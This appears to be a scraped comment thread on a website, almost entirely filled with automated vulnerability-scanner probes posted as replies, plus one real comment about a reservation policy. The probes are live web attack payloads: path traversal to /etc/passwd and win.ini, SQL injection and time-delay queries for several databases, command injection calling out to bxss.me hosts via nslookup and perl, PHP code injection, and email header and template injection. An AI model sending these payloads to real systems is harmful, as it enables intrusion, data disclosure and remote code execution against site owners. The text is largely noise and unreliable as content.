invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: gomaizo
|(nslookup hitttdeweowxy3f0a6.bxss.me||perl -e "gethostbyname('hitttdeweowxy3f0a6.bxss.me')")
re: gomaizo
c:/windows/win.ini
re: gomaizo
'.print(md5(31337)).'
re: gomaizo
'"
re: gomaizo
file:///etc/passwd
re: gomaizo
bxss.me
re: gomaizo
`(nslookup hitvuuqlarkxu8829a.bxss.me||perl -e "gethostbyname('hitvuuqlarkxu8829a.bxss.me')")`
re: gomaizo
/\../\../\../\../\../\../\../etc/passwd
re: gomaizo
<!--
re: gomaizo
;(nslookup hitfggoffsyydfba8b.bxss.me||perl -e "gethostbyname('hitfggoffsyydfba8b.bxss.me')")|(nslookup hitfggoffsyydfba8b.bxss.me||perl -e "gethostbyname('hitfggoffsyydfba8b.bxss.me')")&(nslookup hitfggoffsyydfba8b.bxss.me||perl -e "gethostbyname('hitfggoffsyydfba8b.bxss.me')")
re: gomaizo
/WEB-INF/web.xml
re: gomaizo
C:\WINDOWS\system32\drivers\etc\hosts
re: gomaizo
../../../../../../../../../../windows/win.ini%00.jpg
re: gomaizo
/../../../../../../../../../../boot.ini
re: gomaizo
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: gomaizo
..\..\..\..\..\..\..\..\windows\win.ini
re: gomaizo
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: gomaizo
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: gomaizo
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: gomaizo
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: gomaizo
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: gomaizo
WEB-INF/web.xml
re: gomaizo
WEB-INF\web.xml
re: gomaizo
1
re: gomaizo
1
re: gomaizo
-1 OR 2+953-953-1=0+0+0+1 --
re: gomaizo
-1 OR 3+953-953-1=0+0+0+1 --
re: gomaizo
-1 OR 2+884-884-1=0+0+0+1
re: gomaizo
-1 OR 3+884-884-1=0+0+0+1
re: gomaizo
-1' OR 2+259-259-1=0+0+0+1 --
re: gomaizo
-1' OR 3+259-259-1=0+0+0+1 --
re: gomaizo
-1' OR 2+941-941-1=0+0+0+1 or 'Qv13GBMe'='
re: gomaizo
-1' OR 3+941-941-1=0+0+0+1 or 'Qv13GBMe'='
re: gomaizo
-1" OR 2+561-561-1=0+0+0+1 --
re: gomaizo
-1" OR 3+561-561-1=0+0+0+1 --
re: gomaizo
if(now()=sysdate(),sleep(15),0)
re: gomaizo
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: gomaizo
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: gomaizo
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: gomaizo
-1; waitfor delay '0:0:15' --
re: gomaizo
-1); waitfor delay '0:0:15' --
re: gomaizo
1 waitfor delay '0:0:15' --
re: gomaizo
0J3yqMsY'; waitfor delay '0:0:15' --
re: gomaizo
-5 OR 337=(SELECT 337 FROM PG_SLEEP(15))--
re: gomaizo
-5) OR 582=(SELECT 582 FROM PG_SLEEP(15))--
re: gomaizo
-1)) OR 316=(SELECT 316 FROM PG_SLEEP(15))--
re: gomaizo
uU3s0zVQ' OR 765=(SELECT 765 FROM PG_SLEEP(15))--
re: gomaizo
jyXdJ4QT') OR 217=(SELECT 217 FROM PG_SLEEP(15))--
re: gomaizo
1spJyIgr')) OR 61=(SELECT 61 FROM PG_SLEEP(15))--
re: gomaizo
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: gomaizo
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: gomaizo
'||(select 1 from (select pg_sleep(15))x)||'
re: gomaizo
''||(select 1 from (select pg_sleep(15))x)||''
re: gomaizo
1'"
re: gomaizo
@@9ja9S
They probably changed their reservation policy. I think probably with people now able to travel, they probably have less local guests.
re: guest
QFIE8pyV
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+640-640-1=0+0+0+1
re: guest
-1 OR 3+640-640-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
QeAIk8S7'; waitfor delay '0:0:15' --
re: guest
-5 OR 877=(SELECT 877 FROM PG_SLEEP(15))--
re: guest
-5) OR 800=(SELECT 800 FROM PG_SLEEP(15))--
re: guest
-1)) OR 264=(SELECT 264 FROM PG_SLEEP(15))--
re: guest
hJ3fHgKD' OR 753=(SELECT 753 FROM PG_SLEEP(15))--
re: guest
j4CoGaBN') OR 403=(SELECT 403 FROM PG_SLEEP(15))--
re: guest
UTwoDAOH')) OR 147=(SELECT 147 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@JNDq3
re: guest
2hNpYYsA
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+235-235-1=0+0+0+1
re: guest
-1 OR 3+235-235-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
XilnZtqq'; waitfor delay '0:0:15' --
re: guest
-5 OR 144=(SELECT 144 FROM PG_SLEEP(15))--
re: guest
-5) OR 465=(SELECT 465 FROM PG_SLEEP(15))--
re: guest
-1)) OR 994=(SELECT 994 FROM PG_SLEEP(15))--
re: guest
e4TJUTsC' OR 522=(SELECT 522 FROM PG_SLEEP(15))--
re: guest
3TJP4WTc') OR 504=(SELECT 504 FROM PG_SLEEP(15))--
re: guest
6sqT9kHH')) OR 503=(SELECT 503 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@RIZOO
re: guest
1BaYaC0f7eO
re: guest
response.write(9043272*9887847)
re: guest
'+response.write(9043272*9887847)+'
re: guest
"+response.write(9043272*9887847)+"
re: guest
%0abcc:074625.67-22212.67.3698e.19990.2@bxss.me
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
to@example.com>%0d%0abcc:074625.67-22213.67.3698e.19990.2@bxss.me
re: guest
${10000483+9999515}
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
'.gethostbyname(lc('hitqp'.'hffjmqskcc406.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(71).chr(98).chr(90).'
re: guest
)
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
".gethostbyname(lc("hitbh"."qisatmtp713ca.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(87).chr(114).chr(88)."
re: guest
!(()&&!|*|*|
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
^(#$!@#$)(()))******
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
echo hekaxt$()\ ihkipa\nz^xyu||a #' &echo hekaxt$()\ ihkipa\nz^xyu||a #|" &echo hekaxt$()\ ihkipa\nz^xyu||a #
re: guest
/etc/passwd
re: guest
&echo szjfto$()\ bbnzzn\nz^xyu||a #' &echo szjfto$()\ bbnzzn\nz^xyu||a #|" &echo szjfto$()\ bbnzzn\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
|echo jlybry$()\ ordxyc\nz^xyu||a #' |echo jlybry$()\ ordxyc\nz^xyu||a #|" |echo jlybry$()\ ordxyc\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
(nslookup hitcvjyywyfoqe72e5.bxss.me||perl -e "gethostbyname('hitcvjyywyfoqe72e5.bxss.me')")
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
$(nslookup hitjyyqmjvknod3c94.bxss.me||perl -e "gethostbyname('hitjyyqmjvknod3c94.bxss.me')")
re: guest
"+"A".concat(70-3).concat(22*4).concat(114).concat(78).concat(120).concat(76)+(require"socket"
Socket.gethostbyname("hitvs"+"dlvvfkkt72150.bxss.me.")[3].to_s)+"
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
bxss.me/t/xss.html?%00
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
&nslookup hiticoggohjno32a35.bxss.me&'\"`0&nslookup hiticoggohjno32a35.bxss.me&`'
re: guest
'+'A'.concat(70-3).concat(22*4).concat(102).concat(83).concat(112).concat(67)+(require'socket'
Socket.gethostbyname('hitzu'+'jhnidplg540c7.bxss.me.')[3].to_s)+'
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
&(nslookup hitskuajxudelb0f8b.bxss.me||perl -e "gethostbyname('hitskuajxudelb0f8b.bxss.me')")&'\"`0&(nslookup hitskuajxudelb0f8b.bxss.me||perl -e "gethostbyname('hitskuajxudelb0f8b.bxss.me')")&`'
re: guest
Http://bxss.me/t/fit.txt
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
|(nslookup hitxotakiwedmf1040.bxss.me||perl -e "gethostbyname('hitxotakiwedmf1040.bxss.me')")
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
`(nslookup hitvmpocvsivh62ceb.bxss.me||perl -e "gethostbyname('hitvmpocvsivh62ceb.bxss.me')")`
re: guest
';print(md5(31337));$a='
re: guest
/etc/shells
re: guest
file:///etc/passwd
re: guest
;(nslookup hitbrovxofkbw4b925.bxss.me||perl -e "gethostbyname('hitbrovxofkbw4b925.bxss.me')")|(nslookup hitbrovxofkbw4b925.bxss.me||perl -e "gethostbyname('hitbrovxofkbw4b925.bxss.me')")&(nslookup hitbrovxofkbw4b925.bxss.me||perl -e "gethostbyname('hitbrovxofkbw4b925.bxss.me')")
re: guest
c:/windows/win.ini
re: guest
";print(md5(31337));$a="
re: guest
'"
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
bxss.me
re: guest
${@print(md5(31337))}
re: guest
<!--
re: guest
/WEB-INF/web.xml
re: guest
${@print(md5(31337))}\
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
'.print(md5(31337)).'
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
/../../../../../../../../../../boot.ini
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.